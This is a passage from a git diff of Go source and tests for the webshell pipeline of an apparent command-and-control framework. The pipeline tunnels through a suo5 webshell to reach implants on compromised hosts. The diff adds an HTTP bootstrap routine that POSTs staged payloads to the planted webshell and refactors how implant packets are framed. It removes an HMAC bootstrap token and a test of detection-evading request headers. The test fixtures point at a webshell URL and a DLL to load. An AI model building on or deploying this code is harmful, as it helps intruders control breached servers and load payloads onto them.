%s", depName) } return nil } +// bootstrapHTTP sends a simple HTTP POST with stage in query string. 
+// ?s=status / ?s=load / ?s=init +func (p *WebShellPipeline) bootstrapHTTP(stage string, payload []byte) ([]byte, error) { + reqURL := fmt.Sprintf("%s?s=%s", suo5ToHTTPURL(p.Suo5URL), stage) + + var bodyReader io.Reader + if payload != nil { + bodyReader = bytes.NewReader(payload) + } + req, err := http.NewRequest("POST", reqURL, bodyReader) + if err != nil { + return nil, err + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := p.httpClient.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body)) + } + return body, nil +} + func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { u, err := url.Parse(p.Suo5URL) if err != nil { @@ -393,9 +360,6 @@ func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { if err != nil { return nil, fmt.Errorf("suo5 config: %w", err) } - if string(conf.Mode) == "half" { - return nil, fmt.Errorf("suo5 detected half-duplex mode; webshell bridge requires full-duplex (target may be behind a buffering reverse proxy)") - } client := &suo5.Suo5Client{Proxy: u, Conf: conf} conn, err := client.Dial("tcp", "bridge:0") if err != nil { @@ -405,84 +369,11 @@ func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { } func (p *WebShellPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { - label := fmt.Sprintf("webshell pipeline %s %s", p.Name, scope) - return core.CombineErrorHandlers( - core.LogGuardedError(label), - func(err error) { - p.Enable = false - if core.EventBroker != nil { - core.EventBroker.Publish(core.Event{ - EventType: consts.EventListener, - Op: consts.CtrlPipelineStop, - Listener: &clientpb.Listener{Id: p.ListenerID}, - Message: label, - Err: core.ErrorText(err), - Important: true, - }) - } - }, - ) -} - -// --- TLV frame protocol: [0xd1][4B sid LE][4B len LE][data][0xd2] --- - 
-func writeFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { - data, err := proto.Marshal(spites) - if err != nil { - return err - } - buf := make([]byte, tlvHeaderLen+len(data)+1) - buf[0] = tlvStart - binary.LittleEndian.PutUint32(buf[1:5], sid) - binary.LittleEndian.PutUint32(buf[5:9], uint32(len(data))) - copy(buf[tlvHeaderLen:], data) - buf[len(buf)-1] = tlvEnd - _, err = conn.Write(buf) - return err -} - -func readFrame(conn net.Conn) (*implantpb.Spites, error) { - var hdr [tlvHeaderLen]byte - if _, err := io.ReadFull(conn, hdr[:]); err != nil { - return nil, err - } - if hdr[0] != tlvStart { - return nil, fmt.Errorf("invalid TLV start: 0x%02x", hdr[0]) - } - length := binary.LittleEndian.Uint32(hdr[5:9]) - if length > maxFrameSize { - return nil, fmt.Errorf("frame too large: %d bytes", length) - } - // +1 for end delimiter - payload := make([]byte, length+1) - if _, err := io.ReadFull(conn, payload); err != nil { - return nil, err - } - if payload[length] != tlvEnd { - return nil, fmt.Errorf("invalid TLV end: 0x%02x", payload[length]) - } - spites := &implantpb.Spites{} - if err := proto.Unmarshal(payload[:length], spites); err != nil { - return nil, err - } - return spites, nil + return core.PipelineRuntimeErrorHandler("webshell", p.Name+" "+scope, p.ListenerID, func() { p.Enable = false }, nil) } // --- Helpers --- -func computeBootstrapToken(secret string) string { - if secret == "" { - return "" - } - if len(secret) <= 32 { - return secret - } - window := time.Now().Unix() / 30 - mac := hmac.New(sha256.New, []byte(secret)) - _ = binary.Write(mac, binary.BigEndian, window) - return hex.EncodeToString(mac.Sum(nil)) -} - func suo5ToHTTPURL(suo5URL string) string { s := strings.TrimSpace(suo5URL) s = strings.Replace(s, "suo5s://", "https://", 1) diff --git a/server/listener/webshell_test.go b/server/listener/webshell_test.go index 2492d212..7d891b66 100644 --- a/server/listener/webshell_test.go +++ b/server/listener/webshell_test.go @@ -1,42 
+1,50 @@ package listener import ( - "encoding/binary" - "io" "net" "net/http" "net/http/httptest" "testing" - "time" + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/IoM-go/proto/client/clientpb" "github.com/chainreactors/IoM-go/proto/implant/implantpb" - "google.golang.org/protobuf/proto" + "github.com/chainreactors/malice-network/server/internal/parser" ) -func TestWriteReadFrameTLV(t *testing.T) { +func TestMaleficParserRoundtrip(t *testing.T) { server, client := net.Pipe() defer server.Close() defer client.Close() + p, err := parser.NewParser(consts.ImplantMalefic) + if err != nil { + t.Fatalf("NewParser: %v", err) + } + want := &implantpb.Spites{ Spites: []*implantpb.Spite{ {Name: "test_cmd", TaskId: 42}, }, } + var sid uint32 = 1234 errCh := make(chan error, 1) go func() { - errCh <- writeFrame(server, want, 1234) + errCh <- p.WritePacket(server, want, sid) }() - got, err := readFrame(client) + gotSid, got, err := p.ReadPacket(client) if err != nil { - t.Fatalf("readFrame: %v", err) + t.Fatalf("ReadPacket: %v", err) } if writeErr := <-errCh; writeErr != nil { - t.Fatalf("writeFrame: %v", writeErr) + t.Fatalf("WritePacket: %v", writeErr) } + if gotSid != sid { + t.Fatalf("sid = %d, want %d", gotSid, sid) + } if len(got.Spites) != 1 { t.Fatalf("spite count = %d, want 1", len(got.Spites)) } @@ -48,61 +56,20 @@ func TestWriteReadFrameTLV(t *testing.T) { } } -func TestWriteFrameTLVWireFormat(t *testing.T) { +func TestMaleficParserInvalidStart(t *testing.T) { server, client := net.Pipe() defer server.Close() defer client.Close() - spites := &implantpb.Spites{ - Spites: []*implantpb.Spite{{Name: "ping"}}, - } - var sid uint32 = 0xDEAD - - go writeFrame(server, spites, sid) - - // Read raw bytes to verify TLV wire format. 
- var hdr [tlvHeaderLen]byte - if _, err := io.ReadFull(client, hdr[:]); err != nil { - t.Fatalf("read header: %v", err) - } - - if hdr[0] != tlvStart { - t.Fatalf("start delimiter = 0x%02x, want 0x%02x", hdr[0], tlvStart) - } - gotSid := binary.LittleEndian.Uint32(hdr[1:5]) - if gotSid != sid { - t.Fatalf("sid = %d, want %d", gotSid, sid) - } - - dataLen := binary.LittleEndian.Uint32(hdr[5:9]) - data, _ := proto.Marshal(spites) - if dataLen != uint32(len(data)) { - t.Fatalf("frame length = %d, want %d", dataLen, len(data)) - } - - // Read payload + end delimiter. - payload := make([]byte, dataLen+1) - if _, err := io.ReadFull(client, payload); err != nil { - t.Fatalf("read payload: %v", err) - } - if payload[dataLen] != tlvEnd { - t.Fatalf("end delimiter = 0x%02x, want 0x%02x", payload[dataLen], tlvEnd) - } -} - -func TestReadFrameInvalidStart(t *testing.T) { - server, client := net.Pipe() - defer server.Close() - defer client.Close() + p, _ := parser.NewParser(consts.ImplantMalefic) go func() { - // Write garbage header. 
- buf := make([]byte, tlvHeaderLen) - buf[0] = 0xFF + buf := make([]byte, 9) + buf[0] = 0xFF // invalid start delimiter server.Write(buf) }() - _, err := readFrame(client) + _, _, err := p.ReadPacket(client) if err == nil { t.Fatal("expected error for invalid start delimiter") } @@ -125,19 +92,6 @@ func TestSuo5ToHTTPURL(t *testing.T) { } } -func TestComputeBootstrapToken(t *testing.T) { - if got := computeBootstrapToken(""); got != "" { - t.Fatalf("empty secret = %q, want empty", got) - } - if got := computeBootstrapToken("short"); got != "short" { - t.Fatalf("short secret = %q, want %q", got, "short") - } - got := computeBootstrapToken("this-is-a-very-long-secret-that-exceeds-32-characters") - if len(got) != 64 { - t.Fatalf("HMAC token length = %d, want 64", len(got)) - } -} - func TestNewWebShellPipelineMissingParams(t *testing.T) { _, err := NewWebShellPipeline(nil, nil) if err == nil { @@ -145,57 +99,59 @@ func TestNewWebShellPipelineMissingParams(t *testing.T) { } } -func TestHTTPTransportOPSECHeaders(t *testing.T) { - var gotUA, gotCT string - ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - gotUA = r.Header.Get("User-Agent") - gotCT = r.Header.Get("Content-Type") - w.WriteHeader(http.StatusOK) - w.Write([]byte("OK")) - })) - defer ts.Close() - - transport := &httpTransport{ - client: ts.Client(), - url: ts.URL, - token: "", +func TestNewWebShellPipelineValidParams(t *testing.T) { + pipeline := &clientpb.Pipeline{ + Name: "ws1", + ListenerId: "listener-a", + Enable: true, + Type: "webshell", + Body: &clientpb.Pipeline_Custom{ + Custom: &clientpb.CustomPipeline{ + Name: "ws1", + Params: `{"suo5_url":"suo5://target/bridge.php","dll_path":"/tmp/bridge.dll"}`, + }, + }, } - _, err := transport.do(wsStageStatus, nil, 0) + p, err := NewWebShellPipeline(nil, pipeline) if err != nil { - t.Fatalf("transport.do: %v", err) + t.Fatalf("NewWebShellPipeline: %v", err) } - - if gotUA != "" { - t.Errorf("User-Agent = %q, want 
empty", gotUA) + if p.Suo5URL != "suo5://target/bridge.php" { + t.Fatalf("Suo5URL = %q, want %q", p.Suo5URL, "suo5://target/bridge.php") } - if gotCT != "application/x-www-form-urlencoded" { - t.Errorf("Content-Type = %q, want application/x-www-form-urlencoded", gotCT) + if p.parser == nil { + t.Fatal("parser should not be nil") } } -func TestHTTPTransportPlaintextEnvelope(t *testing.T) { - token := "my-secret-token" - var receivedBody []byte - +func TestBootstrapHTTPQueryString(t *testing.T) { + var gotStage, gotCT string ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - receivedBody, _ = io.ReadAll(r.Body) + gotStage = r.URL.Query().Get("s") + gotCT = r.Header.Get("Content-Type") w.WriteHeader(http.StatusOK) - w.Write([]byte("OK")) + w.Write([]byte("LOADED")) })) defer ts.Close() - transport := newHTTPTransport("suo5://unused", token, 5*time.Second) - transport.client = ts.Client() - transport.url = ts.URL - - _, err := transport.do(wsStageStatus, []byte("test"), 0) + p := &WebShellPipeline{ + Suo5URL: ts.URL, // use test server URL directly + httpClient: ts.Client(), + } + // Override suo5ToHTTPURL by using an http:// URL directly + body, err := p.bootstrapHTTP(wsStageStatus, nil) if err != nil { - t.Fatalf("transport.do: %v", err) + t.Fatalf("bootstrapHTTP: %v", err) } - // Envelope is plaintext: first byte must be the raw stage code. - if len(receivedBody) == 0 || receivedBody[0] != wsStageStatus { - t.Errorf("first byte = 0x%02x, want 0x%02x (plaintext stage)", receivedBody[0], wsStageStatus) + if gotStage != "status" { + t.Errorf("stage query = %q, want %q", gotStage, "status") + } + if gotCT != "application/octet-stream" { + t.Errorf("Content-Type = %q, want %q", gotCT, "application/octet-stream") + } + if string(body) != "LOADED" { + t.Errorf("body = %q, want %q", string(body), "LOADED") } }